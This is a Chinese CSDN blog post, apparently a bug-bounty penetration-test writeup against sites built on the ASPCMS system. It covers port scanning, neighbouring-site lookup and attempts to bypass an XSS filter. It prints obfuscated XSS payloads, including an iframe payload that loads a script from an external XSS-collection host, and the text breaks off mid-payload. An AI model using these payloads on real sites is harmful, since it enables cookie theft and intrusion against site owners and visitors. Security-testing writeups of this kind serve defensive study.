为了冰箱贴的一次渗透测试

本文记录了一次针对ASPCMS建站系统的渗透测试过程,涉及端口扫描、XSS与SQL注入尝试、旁站利用、弱口令攻击和漏洞挖掘。在测试中,作者发现了多个安全问题,包括SQL注入、XSS过滤绕过等,但最终未能深入所有服务器的后台。文章强调了渗透测试的复杂性和挑战性。
摘要由CSDN通过智能技术生成

作者:贝米少年

在漏洞盒子看到冰箱贴不错 刷点站

目标:还是建站系统(因为建站系统的客户基本都做seo 大概都是在权1左右 正好达标)

Nmap 扫一下端口 看到8888知道是宝塔 终于不是虚机了。。。 3389开启

image-20210514091556782

尝试访问一下888/pma 8080 8888 8080访问不了

image-20210514093509769

image-20210514093441790

image-20210514093855741

whatweb.bugscaner.com 查询一下服务器信息 得知 aspcms

image-20210514093843802

查看旁站 tools.ipip.net/ 点进去看了几个 全是ASPCMS

image-20210514094027205

试了一下网上的exp 都没有存在 应该都被修复了吧 后台也没找到

找到一个框框,尝试XSS 被拦了

image-20210514101639201

image-20210514101729885

使用不常见标签bypass 还是被拦了

burpsuite fuzz 找到几个200 的

image-20210514103223758

在先知找了几个bypass payload 还是有过滤了

<video onkeyup=setTimeout'al\x65rt\x28/2/\x29'''>
<svg onmouseover=setTimeout'al\x65rt\x28/233/\x29'''>

image-20210514103314099

实体16进制编码

WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<script sRC="https://xss.pt/aNWy"></script>>

以上实体16进制编码进行一次URL编码

%3Ciframe%20WIDTH%3D0%20HEIGHT%3D0%20srcdoc%3D%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%26%

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值